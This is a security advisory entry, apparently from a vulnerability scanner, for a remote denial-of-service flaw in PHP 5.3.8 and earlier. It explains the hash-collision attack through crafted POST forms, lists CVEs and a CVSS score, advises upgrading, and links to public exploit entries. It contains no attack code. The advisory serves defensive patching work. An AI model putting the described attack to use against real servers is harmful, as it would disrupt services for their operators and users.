Summary
This host is installed with PHP and is prone to remote denial of service vulnerability.
Impact
Successful exploitation could allow remote attackers to cause a denial of service via a specially crafted form sent in a HTTP POST request.
Impact Level: Application
Solution
Upgrade PHP to 5.3.9 or later,
For updates refer to http://php.net/downloads.php
Insight
The flaws are due to an error in,
- A hash generation function when hashing form posts and updating a hash table. This can be exploited to cause a hash collision resulting in high CPU consumption via a specially crafted form sent in a HTTP POST request.
- PDORow implementation, when interacting with the session feature.
- timezone functionality, when handling php_date_parse_tzfile cache.
Affected
PHP Version 5.3.8 and prior.
References
- http://secunia.com/advisories/47404
- http://svn.php.net/viewvc?view=revision&revision=321040
- http://www.exploit-db.com/exploits/18296/
- http://www.exploit-db.com/exploits/18305/
- http://www.kb.cert.org/vuls/id/903934
- http://www.ocert.org/advisories/ocert-2011-003.html
- http://xforce.iss.net/xforce/xfdb/72021
- https://bugs.php.net/bug.php?id=53502
- https://bugs.php.net/bug.php?id=55776
Updated on 2015-03-25
Severity
Classification
-
CVE CVE-2011-4885, CVE-2012-0788, CVE-2012-0789 -
CVSS Base Score: 5.0
AV:N/AC:L/Au:N/C:N/I:N/A:P
Related Vulnerabilities
- EtherApe RPC Packet Processing Denial of Service Vulnerability
- Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
- Dopewars Server 'REQUESTJET' Message Remote Denial of Service Vulnerability
- ClamAV 'parseicon()' Denial Of Service Vulnerability
- Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow Vulnerability